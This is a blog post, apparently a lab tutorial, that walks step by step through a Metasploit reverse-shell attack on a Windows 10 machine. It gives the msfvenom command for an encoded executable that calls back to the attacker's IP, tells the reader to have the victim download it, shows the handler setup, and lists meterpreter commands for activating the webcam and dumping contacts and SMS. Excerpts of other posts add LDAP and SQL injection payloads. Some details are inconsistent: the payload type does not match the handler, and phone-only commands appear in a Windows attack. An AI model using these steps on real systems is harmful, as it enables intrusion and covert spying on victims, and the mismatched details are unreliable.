Metasploit reverse attack on windows

We are going to make payload to do reverse attack on Windows system.

Because Windows 10 has patched, exploit will not work. We are going to make payload to do the attack. 
Turn off the firewall on Windows with administrator's privilege.

Victim: Windows 10, IP is 10.211.55.12
Attacker : kali, IP is 10.211.55.9
tools : msfconsole, msfvenom

Step 1:  construct payload with msfvenom

msfvenom -a x86  -p windows/shell/reverse_tcp LHOST=10.211.55.9 LPORT=4444 -e x86/shikata_ga_nai -f exe -o /tmp/2.exe 

LHOST is my local host, kali
LPORT is my local port 
The generated file is /tmp/2.exe


Step 2: make the victim to download the malicious file:
Launch a web service on kali.

On Windows machine, we type the kali's IP in the browser, and download 2.exe.


Step 3: launch the attack
Launch msfconsole
set the payload and handler
start the attack with 'run'

$ msfconsole
msf5> use exploit/multi/handler
msf5> set payload windows/meterpreter/reverse_tcp
msf5> show options
msf5> run 

Add caption

Now, the connection has been bulit successfully!

Step 4: type the command 
Type the command on kali
To open the camera on the victim's machine: webcam_stream 
s

There are also some other command:
screenshot : take a screenshot and saved on the attackers' machine.

dump_contacts : exports the phone

dump_sms : exports the information

webcam_list :lists cameras

webcam_stream :turns on the camera

webcam_snap : take a photo

webcam_chat : Video call

ps :lists all processes

activity_start :starts other applications

check_root : checks for root.

Ps: this can also be done on a phone.





Popular posts from this blog

Phonebook - Hack the box Write up -- Web LDAP injection

Image
 0x00 Problem  0x01 Check the vulnerability When we see the login form on the website, it might be command injection, SQL injection, LDAP injection.  We can see that this need us to login with workstation username, it might be LDAP injection. 0x02 LDAP injection payload Here is the basic LDAP injection payload. We can check the vulnerability. user=*)(& password=*)(& --> (&(user=*)(&)(password=*)(&))  After we type it, we found the response shows successful, and return a page has search box. Then we type a character in the search box, and it returns some user phonebook information. I tried 'flag', 'HTB', it doesn't find any results. Then we try to find user 'Reese', but the information doesn't look like flag.   0x03 Locate the flag  Then we change our payload to check if the password is the flag. user=Reese password=HTB*)(& --> (&(user=Reese)(password=HTB*)(&  It can also return to the search page which means it...
Read more

wafwaf -- Hack The Box -- Web SQL injection

Image
0x00 Problem 0x01 Check the Source Code We open the website and only see the source code on the website. As we can see, there is a WAF will filter some characters and words, that means the normal injection will not work. However, we can see, there is a json_decode() function will decode JSON data, that means the data can be accepted should be JSON format.  The example JSON format data is like: /u0074, /u0075. In addition, there is a "php://input",  accesses the read-only stream of the requested raw data, executing the data in the post request as PHP code. 0x02 Local Test We can launch an Apache server to test it. I copy the source code and make a little change to test this. This file is in /var/www/html. We will construct the data first. This time I use 'select' as an example. The word transfer to ASCII, then to hex, then replace the '\0x' as '\u00'. This can be test in the browser console. At the end, we can test it with curl . As we can see, the SQL...
Read more

Time-based SQLMap and Tamper scripts construct

Image
Types of SQLMap: Boolean-based blind:  replaces or appends to the affected parameter in the HTTP request. Alternatively , the user can provide a string or regular expression to match on True pages. Time-based blind:   For each HTTP response, by making a comparison between the HTTP response time with the original request, the tool inference the output of the injected statement character by character.   Error-based:   This technique works only when the web application has been configured to disclose back-end database management system error messages. UNION query-based: UNION ALL SELECT, execute the for loop http://178.62.0.100:32104/portfolio.php?id=1 union all select 1,load_file("/var/www/html/administrat/panel.php),3--  Stacked queries : piggybacking.  it appends to the affected parameter in the HTTP request, a semi-colon ( ; ) followed by the SQL statement to be executed. Time-based blind injection:  How time-based blind injection works? The function ...
Read more